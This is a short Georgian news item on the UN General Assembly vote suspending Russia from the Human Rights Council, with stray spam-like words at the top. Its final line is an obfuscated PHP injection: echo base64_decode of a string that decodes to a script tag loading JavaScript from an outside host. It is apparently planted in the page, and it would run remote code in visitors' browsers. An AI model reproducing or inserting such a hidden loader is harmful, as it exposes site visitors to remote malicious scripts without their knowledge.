celsiusi
ავერსი შნაიდერი
გაეროს გენერალურ ასამბლეაზე რუსეთს გაეროს ადამიანის უფლებათა საბჭოს წევრობა შეუჩერდა. ხმის მიცემის შედეგად 93-მა წარმომადგენელმა ინიციატივას მხარი დაუჭირა, 24-მა მათგანმა უარი განაცხადა, ხოლო 58-მა კი პოზიციის დაფიქსირებისგან თავი შეიკავა.
 
რეზოლუციის პროექტში გაეროს გენერალურმა ასამბლეამ აღნიშნა, რომ გენერალური ასამბლეა „შეუჩერებს ადამიანის უფლებათა საბჭოში წევრობის უფლებას საბჭოს წევრს, რომელიც ჩაიდენს ადამიანის უფლებების უხეშ და სისტემატიურ დარღვევას“.
 
გაეროს გენერალური ასამბლეაში 193 წევრია. გენერალური ასამბლეის წევრების ხმათა 2/3-ს შეუძლია შეუჩეროს ქვეყანას ადამიანის უფლებათა საბჭოში მუშაობა ადამიანის უფლებების უხეში და სისტემატური დარღვევისთვის. ადამიანის უფლებათა 47 -წევრიან საბჭოში წელს რუსეთისთვის სამწლიანი ვადის მეორე წელია.
752
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");